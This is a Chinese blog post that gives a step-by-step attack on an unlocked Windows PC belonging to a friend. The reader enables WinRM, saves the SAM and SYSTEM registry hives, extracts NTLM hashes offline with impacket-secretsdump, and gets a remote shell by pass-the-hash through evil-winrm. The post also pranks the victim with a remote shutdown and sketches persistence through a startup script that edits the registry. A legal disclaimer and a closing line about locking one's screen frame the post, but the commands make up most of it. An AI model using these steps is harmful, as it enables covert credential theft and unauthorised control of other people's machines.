物理hack

声明

声明
文章只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。

✍🏻作者简介:致力于网络安全领域,目前作为一名学习者 ,很荣幸成为一名分享者 ,最终目标是成为一名开拓者 ,很有趣也十分有意义

🤵‍♂️ 个人主页: @One_Blanks

欢迎评论 💬点赞👍🏻 收藏 📂加关注+

目录

    • 声明
    • 前期准备
    • 操作开始
      • 一、来到目标主机前(当然需要电脑开着屏幕)
        • [1. 使用管理员身份运行PowerShell](#1. 使用管理员身份运行PowerShell)
        • [2. 开启WinRM 服务(远程控制服务)](#2. 开启WinRM 服务(远程控制服务))
        • [3. 用管理员身份打开CMD命令行](#3. 用管理员身份打开CMD命令行)
        • [4. 获取内网IP与敏感信息文件](#4. 获取内网IP与敏感信息文件)
      • 二、回到自己的电脑打开kali(如果没有关注公众号自取,内有镜像源)
        • [1. 将拿到的文件放到kali,并进入到当前目录](#1. 将拿到的文件放到kali,并进入到当前目录)
        • [2. 先看一下内网IP(我这里是192.168.3.24)](#2. 先看一下内网IP(我这里是192.168.3.24))
        • [3. 使用impacket-secretsdump工具对注册表进行密码解析](#3. 使用impacket-secretsdump工具对注册表进行密码解析)
        • [4. 使用evil-winrm工具进行连接](#4. 使用evil-winrm工具进行连接)
        • [5. 成功连接](#5. 成功连接)
    • 三、扩展
    • 总结

前期准备

数据传输:我们需要一个U盘存储几个文件,或者直接用社交聊天软件发给自己也行

操作环境:另外还需要kali Linux系统,要使用到里面evil-winrm工具、impacket工具

网络环境:需要和被控制的主机处于一个局域网下(就是连同一个WIFI)

公众号中有精心整理的资料工具,需要自取

操作开始

一、来到目标主机前(当然需要电脑开着屏幕)

1. 使用管理员身份运行PowerShell
2. 开启WinRM 服务(远程控制服务)
  • 先在WIFI属性中将公用网络配置为专用网络(否则无法开启服务)
  • 在PowerShell中使用命令开启WinRM服务
cmd 复制代码
enable-psremoting
3. 用管理员身份打开CMD命令行
4. 获取内网IP与敏感信息文件
  • 到C盘的根目录,方便拿文件
cmd 复制代码
cd \
  • 获取IP
cmd 复制代码
ipconfig >ip.txt
  • 获取注册表敏感信息
cmd 复制代码
reg save HKLM\SAM sam.save
cmd 复制代码
reg save HKLM\SYSTEM system.save
  • 将这三个文件拿到手就可以偷偷撤走了(趁朋友还没发现)

二、回到自己的电脑打开kali(如果没有关注公众号自取,内有镜像源)

1. 将拿到的文件放到kali,并进入到当前目录
2. 先看一下内网IP(我这里是192.168.3.24)
bash 复制代码
cat ip.txt
3. 使用impacket-secretsdump工具对注册表进行密码解析
  • 如果没有impacket工具要先安装
bash 复制代码
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python3 -m pip install .  
python3 setup.py install
  • 解析敏感文件
bash 复制代码
impacket-secretsdump -sam sam.save -system system.save LOCAL

直接解析出来了,记录使用第二个哈希密码(中间用冒号 : 隔开了)

4. 使用evil-winrm工具进行连接
  • 安装
bash 复制代码
sudo apt install evil-winrm
  • 连接
bash 复制代码
evil-winrm -i 192.168.3.24 -u 28374 -H 064298325933c9178c0588c0fd2f1b47

-i 选项后面是目标IP

-u 选项后面是目标用户

-H 选项后面是目标用户的哈希密码

5. 成功连接
  • 十秒关机命令: shutdown -s -t 10

这个时候就可以玩了,你可以和你的朋友说:我数十个数你电脑就会关机你信不信。

十秒后当然也是成功可以装到。

三、扩展

我们经过这一系列操作也是成功拿到它的电脑的权限,但是如果开启的服务被发现了然后被关闭了怎么办,那样就直接失去了对这台主机的控制,所以我们可以去写一个bat批命令处理脚本,加入一系列的reg注册表命令,添加到主机自启动中去,并写一个判断逻辑,查询WinRM服务启动状态,如果关闭,那就修改注册表给它开启,这样就可以持续获得这台主机的权限。

当然了,这只是一个思路,实现就由你们去做吧

总结

这篇文章不仅仅教会大家这些网络技术,更是想提高大家的安全意识,即使电脑就放在那里也是会被人进行操作的,要养成电脑常锁屏的好习惯,最大的安全漏洞不在系统,在于人类。提高个人网络安全意识,也是在提高国家的网络安全。

相关推荐
IT成长日记2 小时前
05【Linux经典命令】Linux 用户管理全面指南:从基础到高级操作
linux·运维·服务器·用户管理·命令
Sapphire~7 小时前
Linux-07 ubuntu 的 chrome 启动不了
linux·chrome·ubuntu
伤不起bb7 小时前
NoSQL 之 Redis 配置与优化
linux·运维·数据库·redis·nosql
广东数字化转型8 小时前
nginx怎么使用nginx-rtmp-module模块实现直播间功能
linux·运维·nginx
啵啵学习8 小时前
Linux 里 su 和 sudo 命令这两个有什么不一样?
linux·运维·服务器·单片机·ubuntu·centos·嵌入式
半桔8 小时前
【Linux手册】冯诺依曼体系结构
linux·缓存·职场和发展·系统架构
网硕互联的小客服9 小时前
如何利用Elastic Stack(ELK)进行安全日志分析
linux·服务器·网络·安全
浩浩测试一下9 小时前
Authpf(OpenBSD)认证防火墙到ssh连接到SSH端口转发技术栈 与渗透网络安全的关联 (RED Team Technique )
网络·网络协议·tcp/ip·安全·网络安全·php
冰橙子id10 小时前
linux——磁盘和文件系统管理
linux·运维·服务器
网安INF10 小时前
CVE-2020-17518源码分析与漏洞复现(Flink 路径遍历)
java·web安全·网络安全·flink·漏洞